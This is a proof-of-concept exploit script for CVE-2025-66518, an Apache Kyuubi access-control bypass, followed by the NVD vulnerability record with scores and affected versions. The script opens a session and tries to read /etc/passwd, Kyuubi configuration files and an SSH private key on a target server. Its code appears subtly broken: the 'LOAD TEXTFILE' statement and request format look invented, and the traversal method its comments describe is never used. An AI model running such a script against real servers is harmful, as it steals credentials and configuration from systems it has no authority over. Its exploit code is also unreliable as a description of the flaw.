CVE-2025-66518

# CVE-2025-66518 PoC - Apache Kyuubi Server Access Control Bypass # Affected Version: Apache Kyuubi 1.6.0 - 1.10.2 # This PoC demonstrates bypassing kyuubi.session.local.dir.allow.list restriction import requests import json TARGET_HOST = "http://target-kyuubi-server:10099" SESSION_USER = "test_user" SESSION_PASSWORD = "test_password" def create_kyuubi_session(): """Create a new Kyuubi session with frontend protocol""" session_config = { "conf": { "spark.master": "local[*]", "kyuubi.session.engine.initialize.startup.timeout": "600s" }, "engineType": "spark", "fetchSchema": True, "user": SESSION_USER } response = requests.post( f"{TARGET_HOST}/api/kyuubi/session", json=session_config, headers={"Content-Type": "application/json"} ) return response.json() def bypass_allow_list(session_handle, file_path): """Bypass kyuubi.session.local.dir.allow.list to read arbitrary files This method exploits the path traversal vulnerability in Kyuubi frontend protocol to access files outside the allowed directory list. """ # Method 1: Direct absolute path access exploit_request = { "sessionHandle": session_handle, "operationHandle": { "operationType": "EXECUTE_STATEMENT", "statement": f"LOAD TEXTFILE '{file_path}'", "runAsync": False, "queryTimeout": 300 }, "confOverlay": {} } # Method 2: Path traversal using relative paths # Example: '../../../etc/passwd' or '../../../opt/kyuubi/conf/secrets.conf' traversal_statement = f"LOAD TEXTFILE '{file_path}'" response = requests.post( f"{TARGET_HOST}/api/kyuubi/operation", json=exploit_request, headers={"Content-Type": "application/json"} ) return response.json() def main(): """Main exploit function""" print("[*] CVE-2025-66518 Apache Kyuubi Access Control Bypass Exploit") print("[*] Target: " + TARGET_HOST) # Step 1: Create session print("\n[+] Step 1: Creating Kyuubi session...") session = create_kyuubi_session() session_handle = session.get("sessionHandle") if not session_handle: print("[-] Failed to create session") return print(f"[+] Session created: {session_handle}") # Step 2: Bypass allow list to read sensitive files target_files = [ "/etc/passwd", "/opt/kyuubi/conf/kyuubi-defaults.conf", "/opt/kyuubi/conf/kyuubi-env.sh", "/home/kyuubi/.ssh/id_rsa" ] print("\n[+] Step 2: Attempting to bypass allow list restrictions...") for file_path in target_files: print(f"\n[*] Attempting to read: {file_path}") result = bypass_allow_list(session_handle, file_path) print(f"[*] Result: {json.dumps(result, indent=2)}") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-66518", "sourceIdentifier": "[email protected]", "published": "2026-01-05T09:15:54.430", "lastModified": "2026-01-27T21:32:32.140", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Any client who can access to Apache Kyuubi Server via Kyuubi frontend protocols can bypass server-side config kyuubi.session.local.dir.allow.list and use local files which are not listed in the config.\n\nThis issue affects Apache Kyuubi: from 1.6.0 through 1.10.2.\n\nUsers are recommended to upgrade to version 1.10.3 or upper, which fixes the issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:L/SC:H/SI:H/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-27"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:kyuubi:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.6.0", "versionEndExcluding": "1.10.3", "matchCriteriaId": "D58033CE-D3EE-4FD3-A49C-620799B49E6D"}]}]}], "references": [{"url": "https://lists.apache.org/thread/xp460bwbyzdhho34ljd4nchyt2fmhodl", "source": "[email protected]", "tags": ["Mailing List"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/05/1", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}